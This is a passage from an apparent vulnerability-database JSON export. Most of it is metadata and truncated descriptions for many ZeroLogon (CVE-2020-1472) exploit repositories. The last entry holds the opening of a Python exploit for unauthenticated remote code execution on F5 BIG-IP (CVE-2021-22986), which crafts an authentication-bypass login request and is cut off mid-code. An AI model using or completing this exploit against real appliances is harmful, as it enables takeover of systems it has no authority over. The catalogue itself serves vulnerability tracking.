"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-07-15T19:52:37", "id": "49EC151F-12F0-59CF-960C-25BD54F46680", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:09:34", "description": "# ZeroLogon testing script\n\nA Python script that uses the Impack...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T03:57:04", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-25T06:08:29", "id": "5B025A0D-055E-552C-B1FB-287C6F191F8E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:34:06", "description": "# CVE-2020-1472 POC\nRequires the latest impacket from [GitHub](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-11-16T17:24:25", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-11-16T17:38:51", "id": "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T05:54:58", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-22T18:51:09", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-04-22T19:03:41", "id": "D7AB3F4A-8E41-5E5B-B987-99AFB571FE9C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:21:44", "description": "# ZeroLogon exploitation script\n\nExploit code based on https://w...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T19:19:07", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-08-15T15:41:40", "id": "A24AC1AC-55EF-51D8-B696-32F369DCAB96", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:07:17", "description": "# CVE-2020-1472\nChecker & Exploit Code for CVE-2020-1472 aka **Z...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T13:50:01", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-20T18:17:37", "id": "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:39:46", "description": "# zerologon\nCheck for events that indicate non compatible device...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-15T15:02:53", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-11-11T09:28:46", "id": "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:21:38", "description": "# CVE-2020-1472 POC\nRequires the latest impacket from [GitHub](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T16:56:51", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-08-17T21:35:55", "id": "D3C401E0-D013-59E2-8FFB-6BEF41DA3D1B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-01T15:13:08", "description": "![Python][python-shield]\n\n# CVE-2020-1472\n\nCVE-2020-1472 - Zero ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T07:25:22", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-04-30T23:21:59", "id": "04BCA9BC-E3AD-5234-A5F0-7A1ED826F600", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:08:34", "description": "# ZeroLogon testing script\n\nA Python script that uses the Impack...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-21T09:42:34", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-01-30T02:59:52", "id": "20466D13-6C5B-5326-9C8B-160E9BE37195", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:33:38", "description": "## Introduction article\nhttps://www.yuque.com/shamo-vs4ia/vul/kt...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T08:32:52", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-11-28T04:59:11", "id": "9C9BD402-511C-597D-9864-647131FE6647", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-18T04:01:25", "description": "# Ladon Moudle CVE-2020-1472 Ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T16:10:21", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-06-18T04:00:40", "id": "14BD2DBD-3A91-55FC-9836-14EF9ABF56CF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:41:26", "description": "#\n# CVE-2020-1472 Event Reader v1.1 8/27/2020\n# This script will...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-11-05T15:17:14", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-11-05T15:19:05", "id": "5E80DB20-575C-537A-9B83-CCFCCB55E448", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:31:50", "description": "# CVE-2020-1472 POC\nRequires the latest impacket from [GitHub](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-21T07:24:03", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-21T07:24:16", "id": "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-15T20:39:16", "description": "# CVE-2020-1472 POC\nmac\u73af\u5883\u4e0b\u901a\u8fc7proxychains\u4ee3\u7406\u7684\u65b9\u5f0f\u5728window\u57df\u73af\u5883\u4e2d\u590d\u73b0\u8be5\u6f0f\u6d1e\u3002\n\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T03:40:47", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-08-15T15:41:40", "id": "F472C105-E3B1-524A-BBF5-1C436185F6EE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-14T14:10:49", "description": "# Zerologon test for SMB & RPC\nA python script based on [SecuraB...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-17T16:53:17", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-08-14T07:26:58", "id": "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:57:02", "description": "# zerologon\nzerologon script to exploit CVE-2020-1472 CVSS 10/10...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-01-01T07:38:58", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-01-17T15:08:53", "id": "3F400483-1F7E-5BE5-8612-4D55D450D553", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T17:49:59", "description": "# ZeroLogon - Exploit and Example\nModified the test PoC from [Se...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-03-01T04:21:47", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-12-29T12:28:45", "id": "BBE1926E-1EC7-5657-8766-3CA8418F815C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "zdt": [{"lastseen": "2021-10-12T11:09:51", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-02T00:00:00", "type": "zdt", "title": "F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated) Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-04-02T00:00:00", "id": "1337DAY-ID-36067", "href": "https://0day.today/exploit/description/36067", "sourceData": "# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)\r\n# Exploit Author: Al1ex\r\n# Vendor Homepage: https://www.f5.com/products/big-ip-services\r\n# Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2\r\n# CVE : CVE-2021-22986\r\n\r\nimport requests\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\nimport sys\r\n\r\n\r\ndef title():\r\n print('''\r\n ______ ____ ____ _______ ___ ___ ___ __ ___ ___ ___ ___ __ \r\n / |\\ \\ / / | ____| |__ \\ / _ \\ |__ \\ /_ | |__ \\ |__ \\ / _ \\ / _ \\ / / \r\n | ,----' \\ \\/ / | |__ ______ ) | | | | | ) | | | ______ ) | ) | | (_) | | (_) | / /_ \r\n | | \\ / | __| |______/ / | | | | / / | | |______/ / / / \\__, | > _ < | '_ \\ \r\n | `----. \\ / | |____ / /_ | |_| | / /_ | | / /_ / /_ / / | (_) | | (_) | \r\n \\______| \\__/ |_______| |____| \\___/ |____| |_| |____| |____| /_/ \\___/ \\___/ \r\n \r\n Author:[email\u00a0protected]\r\n Github:https://github.com/Al1ex\r\n ''') \r\n\r\ndef exploit(url):\r\n\ttarget_url = url + '/mgmt/shared/authn/login'\r\n\tdata = {\r\n\t\t\"bigipAuthCookie\":\"\",\r\n\t\t\"username\":\"admin\",\r\n\t\t\"loginReference\":{\"link\":\"/shared/gossip\"},\r\n\t\t\"userReference\":{\"link\":\"https://localhost/mgmt/shared/authz/users/admin\"}\r\n\t}\r\n\theaders = {\r\n\t\t\"User-Agent\": \"hello-world\",\r\n\t\t\"Content-Type\":\"application/x-www-form-urlencoded\"\r\n\t}\r\n\tresponse = 